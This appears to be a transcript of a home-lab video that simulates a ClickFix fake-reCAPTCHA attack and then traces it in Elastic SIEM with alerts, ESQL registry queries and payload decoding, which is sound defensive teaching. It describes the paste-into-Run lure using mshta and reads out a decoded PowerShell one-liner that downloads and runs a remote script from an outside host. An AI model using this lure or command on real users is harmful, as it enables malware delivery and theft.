Hey, we're in my lab here today, and we're going to take a look at this ClickFix attack vector in Elastic. Here are my hosts. We have the Elastic host and the Kibana host serving the Elastic stack, my Windows 10 host that we'll take a look at in a minute, the DCO one that we won't get to today, the web app serving this reCAPTCHA phish attack vector, and the Kali Linux box that should host a listener for the final malware. Pivoting over to the RDP session, this is the Windows 10 host. We'll go ahead and launch Edge here and navigate to the statically routed web app over at 205. Here you can see the ClickFix reCAPTCHA attack vector. It's the same one from John Hammond here. In his attack vector, he sets mshta to download this reCAPTCHA verify script. I've modified mine a bit. Taking a look, I'm using mshta to download this admin page hosted on my test domain that I utilize in security experiments. Let's go ahead and run the experiment and see what Elastic sees. Clicking the I'm not a robot, this is where you would lure your victims with impersonating software, something like that, getting them to ultimately click on this I'm not a robot that they have likely seen before with the real reCAPTCHA. Of course, in ours, it instructs the user to press the Windows key and R to paste some command, and we'll see what happens next. So pressing Windows key plus R and pasting in the command. My old one was already there, but here this is what's on my clipboard. As you can see, this is just pasted from my clipboard. It has this comment afterwards to kind of mask the payload here. So in our run dialog box, hitting OK. And seemingly nothing has happened. We'll take a look at Elastic and see what really happened. So over in Elastic, this is just the normal Elastic stack. This is mine hosted on this Elastic host and this Kibana host. It has a fleet server running also off the Kibana host, and it has no redundancy. Please don't do this. This is really just for my lab. Again, this is really just for practice. But we can see the Kibana host that's running my fleet server and Kibana, as well as the desktop here under my Windows policy. And both agents are healthy. Both agents are relatively up to date. This is Elastic version 9.14, or 9.1.4, excuse me. So navigating over to the alerts, let's see if we've gotten anything so far for that malicious action earlier. Unusual network activity from a Windows system binary. This is pretty good. This is mshta reaching out to the network. That's pretty suspicious. You know, usually you don't see that unless it's being used as a lull bin. We'll give it a few minutes here and see if we see anything else. We should get a few more alerts here. The polling time for most of these alerts, I believe, is 5 minutes, which means you should see an alert of your malicious activity in 5 minutes. It seems like these happen to poll a little bit quicker. All right, we might get one or two more, but this is good enough for me. We can see this network activity. Eventually, it looks like our attack vector spawned PowerShell, script execution via Microsoft HTML application. This is extremely abnormal. I'm glad that this got a high. There really is no reason that you would see script execution from Microsoft HTML, from a Microsoft HTML application unless it were doing something malicious. We did get this alert that is an exact match of the attack vector. Again, this is calling it fake CAPTCHA, and what we deployed was reCAPTCHA or ClickFix. Fake CAPTCHA, all referring to the same thing. Let's take a look at this script execution and see what it is evaluating here. I like to start with process fields as I feel that those give me the most kind of context that the alert is doing. Here we see the command line, and looking at this, you can probably recognize this as abuse of a lull bin, mshta. It's interesting, it's really just flagging this mshta usage to download an HTTP file. It looks like it's a disjunctive condition here, this one, and then we have this OR for the rest here. Additionally, kind of pivoting into this fake CAPTCHA one, if we look at what the query is actually looking for, it's really just looking for CAPTCHA verif verification UID, not a robot, etc. Kind of just these string matches that are the default paste in that comment that I was looking at earlier. I am not a robot, reCAPTCHA, etc. Notice that in this query, it's not stringing together user events. It's not building out a timeline. It really is just as simple as doing a string match. Additionally, it doesn't appear as though any of these have registry events. So by now, hopefully, the SOC or security analysts or whoever is looking at this is going to identify this desktop and this user as potentially being breached. Let's take a look at Discover under Analytics and see if we can find any additional details. Let's swap over to ESQL. Now doing some OSINT on ClickFix. This article is pretty good. This one is as well. This is a pretty old article. It has a lot of IoCs from, a year ago or so. You could have fun threat hunting this. Go off, King, This one is also pretty good from Microsoft. They talk about the final payload being a remote access tool, a rootkit like R77, or various stealers like Luma Stealer, Raccoon Stealer, etc. This is often a fileless payload that is executed in memory, and eventually leaving an artifact in this run RMU registry key. Now we can write a custom query to target that forensic artifact. I'm going to start by targeting all of my logs. And now I'm going to define my condition. Where, and I want the field registry.key, and I want any instances where this field ends with the string run MRU. Now this will bring me anytime that registry key is interacted with as a forensic artifact. However, because I already know MSHTA was the attack vector, I can further specify registry.data.strings like MSHTA. And here's this event where we can see the forensic artifact running this payload. Now we can pivot and define another condition and find any instances where this host ran MSHTA for that admin page, where process.name equals mshta.exe and process.command line like admin page.hta. Cool. Now I have these two results, and I can see the process executable, how the user logged on, and all sorts of other information about the process. Here we can see the parent was explorer.exe, further solidifying this ClickFix attack vector. To see if this process spawned any other processes, we can add the .parent field into our already existing fields. Cool, another two results here. And it looks like we did get some child processes. Now I want just the process names, so I'll do a count. I'll define my count variable and set it equal to count by process.name. So it looks like we spawned PowerShell twice. Let's take a look at those events again. So taking a look at the process fields, we can see this tac EC, tac EC, tac enc, tac enc, tac EC, tac encoded, tac enco, All of these will run encoded PowerShell, and PowerShell will complete the rest. So now we see we've got this encoded command here. Let's copy it and put it into CyberChef. Here in CyberChef, I have my recipes already set up to encode and decode base64 in Windows. Base64 uses UTF-16LE encoding, which means when you decode, you get a lot of trailing null bytes. So removing those, we get this command: PowerShell exe window style hidden execution policy bypass no logo no profile tac c iex new object net.webclient.download string http satanonly.com/admin.ps1. Window style hidden execution policy bypass no logo no profile, these are all extremely common. Where it gets interesting is this iex command. IEX means invoke expression, which means it's creating this new object, web client download string, and immediately invoking it. That means that it's running this admin.ps1 script in memory. Taking a look at my Kali box, I forgot to run my netcat listener, so it wouldn't have connected anyway because I believe this admin.ps1 will get killed. However, it sure as shit didn't connect now. That being said, you could take this process PID and search for any outbound connections or any destination IPs and see if there's been any C2 or exfiltration attempts. The main takeaway is that we can find this forensic artifact with this registry key field and further specifying malicious actions with this registry.data.strings conditions. We can search for HTTP requests by appending this HTTP in our registry.data.strings like matching. We can also add a disjunctive condition to our conjunctive search and further specify other attacks like PowerShell. Now we have any instance where the registry key ends with MRU and any of these conditions. These conditions are broken down into our single condition of MSHTA with HTTP, or this condition where we have PowerShell and any one of these, tac EC or tac encode. Pay special care to how the parentheses break down the logic. Running this for the past week, we should see all of my experiments. While we weren't able to see any file writes to disk due to the in-memory execution, and while we weren't able to see the execution due to, again, it being in memory, we were able to see many of the command lines and forensic artifacts that this attack vector left behind. Hopefully, this elucidates how you can utilize Elastic and your SIEM solution to better protect yourself and navigate the scope of an attack. Thank you.